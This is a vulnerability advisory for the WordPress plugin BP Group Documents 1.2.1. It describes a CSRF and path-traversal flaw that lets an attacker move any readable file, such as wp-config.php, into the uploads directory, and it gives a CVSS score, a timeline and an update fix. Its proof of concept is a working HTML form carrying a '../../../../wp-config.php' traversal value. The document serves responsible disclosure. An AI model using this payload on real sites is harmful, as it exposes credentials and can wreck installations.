Moving any file PHP user has access to in BP Group Documents 1.2.1


Last revised:

An admin user (or anybody, since there is a CSRF vulnerability in this form) can move any file the PHP user has access to to a location inside the uploads directory.  From the uploads directory, they are likely to be able to read the file.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 9 High
Vector Network
Complexity Low
Authentication None
Confidentiality Partial
Integrity Partial
Availability Complete
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

As a logged in admin, visit a page containing this form and submit it (or add auto-submission, and cause a logged in admin to visit it):

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=bp-group-documents-settings">
  <input name="group" value="1">
  <input name="file" value="../../../../wp-config.php">
  <input type="submit">

This will cause the wp-config.php file to be moved to a location within wp-content/uploads. In my case it was wp-content/uploads/group-documents/1/1380203685-……..wp-config.php. In this example I broke a WordPress installation, leaving the site wide open to another person to come in and do the “famous five minute install”. There may also be handy config files laying around that you could read by moving them to the web root.

Advisory timeline

  • 2013-09-26: Discovered
  • 2013-09-30: Reported to
  • 2013-10-04: Fix released (1.2.2)

Mitigation/further actions

Update to version 1.2.2.